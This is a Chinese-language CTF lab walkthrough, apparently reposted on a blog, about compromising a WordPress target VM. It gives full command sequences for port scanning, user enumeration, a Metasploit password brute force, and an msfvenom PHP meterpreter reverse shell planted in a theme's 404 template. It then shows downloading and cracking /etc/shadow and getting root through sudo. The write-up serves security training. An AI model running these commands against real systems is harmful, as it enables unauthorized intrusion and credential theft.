当前位置:   article > 正文

CTF练习:HTTP服务之暴力破解_can you exploit http?

can you exploit http?


靶机地址:
链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg
提取码: t8uz

环境准备

开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为192.168.137.176
在这里插入图片描述
查看靶机的IP,为192.168.137.176

在这里插入图片描述
ping一下,测试连通性,没问题,开始信息收集。
在这里插入图片描述

信息收集

探测靶场开放的端口信息与服务版本

nmap -sV 192.168.137.197
  • 1

在这里插入图片描述
使用nikto对开放的80端口进行进一步挖掘,发现可疑目录,/sercet/。

nikto -host http://192.168.137.197
  • 1

在这里插入图片描述
把它粘贴到浏览器去访问一下

http://192.168.137.197/secret/
  • 1

在这里插入图片描述
往下浏览,发现一个log in链接,点击
在这里插入图片描述
发现后台登录页面。
在这里插入图片描述

暴力破解

使用wpscan,获取目标网页的用户名,发现用户名admin。

wpscan --url 192.168.137.197/secret/ --enumerate u
  • 1

在这里插入图片描述
得到了用户名,那接着使用metasploit对密码进行暴力破解。

启动
msfconsole  
选择模块
use auxiliary/scanner/http/wordpress_login_enum
查看参数
show options
设置目标ip
set rhosts 192.168.137.197
设置密码文件
set PASS_FILE /usr/share/wordlists/dirb/common.txt
设置我们已经知道的用户名admin
set username admin
设置目标uri
set targeturi /secret/
运行,开始破解
run
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
破解成功,用户名为admin,密码为admin。
在这里插入图片描述
去登录页面,输入admin和admin进入后台
在这里插入图片描述
在这里插入图片描述

制作与上传shell

使用msfvenom制作shell代码,将代码复制下来。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.176 lport=4444 -f raw
  • 1

在这里插入图片描述
去到后台页面,点击右侧的Appearance的editor
在这里插入图片描述
再点击右侧的404 Template,将其代码替换成我们的shell代码
在这里插入图片描述
点击update file按钮提交,更新完成。
在这里插入图片描述
回到终端,使用msf监听4444端口

退出当前模块
back
使用监听模块
use exploit/multi/handler
设置为php模式
set payload php/meterpreter/reverse_tcp
查看参数
show options
设置kali的ip
set LHOST 192.168.137.176
开始监听
run
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

在这里插入图片描述
去浏览器访问shell所在的404页面。

192.168.137.197/secret/wp-content/themes/twentyseventeen/404.php
  • 1

在这里插入图片描述
回到终端,已经返回了shell,sysinfo一下没问题。
在这里插入图片描述

进入靶机与提权

输入shell,id一下,是www-data用户,权限不够,需提权
在这里插入图片描述
下载/etc/passwd和/etc/shadow文件

download /etc/passwd
download /etc/shadow
  • 1
  • 2

在这里插入图片描述
新开一个终端,ls一下,可以看到下载的两个文件,使用unshadow进行整合

unshadow passwd shadow > cracked
  • 1

在这里插入图片描述
使用john对生成的cracked进行解密,得到用户marlinspike与密码marlinspike
在这里插入图片描述
回到终端的shell,先优化终端一下

python -c "import pty;pty.spawn('/bin/bash')"
  • 1

在这里插入图片描述
开始root提权操作

切换到marlinspike用户
su - marlinspike
查看权限
sudo -l
提权
sudo bash
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

在这里插入图片描述
进入到root目录,寻找flag文件。
在这里插入图片描述
这次靶机主要是相关的HTTP服务练习,并没有flag值,所以至此完工!!!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/616306
推荐阅读
相关标签
  

闽ICP备14008679号